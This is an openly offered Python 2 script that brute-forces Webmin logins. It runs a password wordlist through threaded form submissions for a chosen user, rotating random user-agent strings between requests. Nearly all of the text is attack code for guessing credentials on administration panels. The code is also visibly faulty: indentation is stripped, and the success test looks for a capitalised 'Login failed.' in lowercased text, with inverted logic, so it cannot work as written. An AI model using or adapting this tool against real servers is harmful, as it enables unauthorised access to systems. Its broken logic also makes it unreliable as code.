#!usr/bin/python#Webmin Brute Forcer#To use this script you need ClientCooki

1. #!usr/bin/python
2. #Webmin Brute Forcer
3. #To use this script you need ClientCookie and Client Form.
4. #http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
5. #http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
6. #To install the package, run the following command:
7. #python setup.py build
8. #then (with appropriate permissions)
9. #python setup.py install
10. #d3hydr8[at]gmail[dot]com
11.  
12. import threading, time, random, sys, socket, httplib, re, urllib2
13. try:
14. sys.path.append('ClientCookie-1.0.3')
15. import ClientCookie
16. sys.path.append('ClientForm-0.1.17')
17. import ClientForm
18. except(ImportError):
19. print "\nTo use this script you need ClientCookie and Client Form."
20. print "Read the top intro for instructions.\n"
21. sys.exit(1)
22. from copy import copy
23.  
24. if len(sys.argv) !=4:
25. print "Usage: ./webminbrute.py <server> <user> <wordlist>"
26. sys.exit(1)
27.  
28. try:
29. words = open(sys.argv[3], "r").readlines()
30. except(IOError):
31. print "Error: Check your wordlist path\n"
32. sys.exit(1)
33.  
34. print "\n\t d3hydr8[at]gmail[dot]com WebminBruteForcer v1.0"
35. print "\t--------------------------------------------------\n"
36. print "[+] Server:",sys.argv[1]
37. print "[+] User:",sys.argv[2]
38. print "[+] Words Loaded:",len(words),"\n"
39.  
40. headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2"]
41.  
42. wordlist = copy(words)
43.  
44. def reloader():
45. for word in wordlist:
46. words.append(word)
47.  
48. def getword():
49. lock = threading.Lock()
50. lock.acquire()
51. if len(words) != 0:
52. value = random.sample(words, 1)
53. words.remove(value[0])
54.  
55. else:
56. print "Reloading Wordlist\n"
57. reloader()
58. value = random.sample(words, 1)
59.  
60. lock.release()
61. return value[0]
62.  
63. class Worker(threading.Thread):
64.  
65. def run(self):
66. global success
67. value = getword()
68. try:
69. print "-"*12
70. print "User:",sys.argv[2],"Password:",value
71. cookieJar = ClientCookie.CookieJar()
72. opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
73. opener.addheaders = [("User-agent", random.sample(headers, 1)[0])]
74. ClientCookie.install_opener(opener)
75. fp = ClientCookie.urlopen(sys.argv[1])
76. forms = ClientForm.ParseResponse(fp)
77. form = forms[0]
78. form["user"] = sys.argv[2]
79. form["pass"] = value
80. fp = ClientCookie.urlopen(form.click())
81. site = fp.readlines()
82. for line in site:
83. if re.search("Login failed.", line.lower()) != None:
84. print "\tSuccessful Login:", value
85. success = value
86. sys.exit(1)
87. fp.close()
88. except(socket.gaierror, urllib2.HTTPError), msg:
89. print msg
90. pass
91.  
92. for i in range(len(words)):
93. work = Worker()
94. work.start()
95. time.sleep(1)
96. time.sleep(3)
97. try:
98. if success:
99. print "\n\n[+] Successful Login:",sys.argv[1]
100. print "[+] User:",sys.argv[2]," Password:",success
101. except(NameError):
102. print "\n[+] Couldn't find correct password"
103. pass
104. print "\n[+] Done\n"